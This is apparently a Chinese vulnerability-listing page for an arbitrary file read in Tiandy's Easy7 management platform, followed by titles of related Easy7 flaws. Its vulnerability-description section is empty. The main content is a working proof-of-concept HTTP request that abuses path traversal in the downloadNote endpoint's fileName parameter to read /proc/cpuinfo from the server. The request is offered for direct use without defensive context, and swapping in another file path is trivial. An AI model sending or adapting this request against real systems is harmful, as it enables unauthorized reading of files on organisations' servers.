天地伟业Easy7 downloadNote 任意文件读取

漏洞描述

PoC代码

GET /Easy7/rest/file/downloadNote?fileName=../../../../../../proc/cpuinfo&fullName=cpuinfo HTTP/1.1

相关漏洞推荐

• 天地伟业Easy7综合管理平台 addGateWayOptLog SQL注入漏洞
• 天地伟业技术有限公司 天地伟业easy7综合管理平台系统存在信息泄露漏洞
• 天地伟业Easy7 Easy7/rest/obj/getActiveEffectTemp SQL 注入漏洞
• 天地伟业Easy7 Easy7/rest/gis/exportGisObj 文件读取漏洞
• 天地伟业 Easy7 /Easy7/rest/file/downloadWordRecord 文件读取漏洞
• 天地伟业 /Easy7/rest/inquestRoom/getCurrentUserInquestRooms_ZHGL SQL 注入漏洞
• 天地伟业easy7综合管理平台系统 addGateWayOptLog 存在SQL注入漏洞
• 天地伟业Easy7 /Easy7/rest/user/queryUserbyDesc SQL 注入漏洞
• POC 天地伟业Easy7 queryUserbyDesc 存在SQL注入漏洞
• 天地伟业Easy7 /Easy7/rest/user/queryPassword 信息泄露漏洞
• 天地伟业Easy7 downloadFile 任意文件读取漏洞
• 天地伟业Easy7 /Easy7/rest/file/downloadNote 目录遍历漏洞
• Easy7综合管理平台 /file/uploadCheckImg 接口 文件上传漏洞